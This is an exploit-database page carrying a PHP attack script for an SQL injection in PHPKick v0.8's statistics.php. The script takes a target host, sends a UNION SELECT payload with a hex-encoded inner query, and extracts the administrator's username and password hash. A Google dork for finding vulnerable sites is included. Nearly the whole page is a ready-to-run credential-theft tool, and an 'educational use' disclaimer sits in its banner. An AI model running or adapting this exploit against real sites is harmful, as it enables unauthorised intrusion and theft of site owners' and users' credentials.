[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPKick v0.8 statistics.php SQL Injection Exploit
# Published : 2010-08-08
# Author : garwga
# Previous Title : wizmall 6.4 CSRF Vulnerabilities
# Next Title : Joomla Yellowpages SQL Injection Vulnerability
# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "? 2004 PHPKick.de Version 0.8"
# Category: webapps/0day
# Code: see below
<?php
echo"nn";
echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|n";
echo"| |n";
echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] |n";
echo"| |n";
echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/ |n";
echo"| |n";
echo"|Notes:This exploit works regardless of the PHP security settings |n";
echo"| (magic_quotes, register_globals).This exploit is only for educational |n";
echo"| use, use it on your own risk! Exploiting scripts without permission of|n";
echo"| the owner of the webspace is illegal! |n";
echo"| I'm not responsible for any resulting damage |n";
echo"| |n";
echo"|Google Dork: "? 2004 PHPKick.de Version 0.8" |n";
echo"| |n";
echo"|Exploit found by garwga (ICQ#:453-144-667) |n";
echo"|============================================================================|nnn";
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
$host=$_SERVER['argv'][1];
$path=$_SERVER['argv'][2];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0)){
$host="http://$host";
}
if(!$host=="http://localhost"){
$spos=strpos($host, "http://www.");
if (!is_int($spos)&&($spos==0)){
$host="http://www.$host";
}
}
$exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
echo"exploiting...n";
$source=file_get_contents($host.$path.$exploit);
$username=GetBetween($source," :<br>",":");
echo "username: $usernamen";
$hash=GetBetween($source,"<br>$username:","</td>");
echo"hash: $hashn";
}
else{
echo"nn";
echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|n";
echo"| |n";
echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] |n";
echo"| |n";
echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/ |n";
echo"| |n";
echo"|Notes:This exploit works regardless of the PHP security settings |n";
echo"| (magic_quotes, register_globals).This exploit is only for educational |n";
echo"| use, use it on your own risk! Exploiting scripts without permission of|n";
echo"| the owner of the webspace is illegal! |n";
echo"| I'm not responsible for any resulting damage |n";
echo"| |n";
echo"|Google Dork: "? 2004 PHPKick.de Version 0.8" |n";
echo"| |n";
echo"|Exploit found by garwga (ICQ#:453-144-667) |n";
echo"|============================================================================|n";
}
function GetBetween($content,$start,$end){
$r = explode($start, $content);
if (isset($r[1])){
$r = explode($end, $r[1]);
return $r[0];
}
return '';
}
?>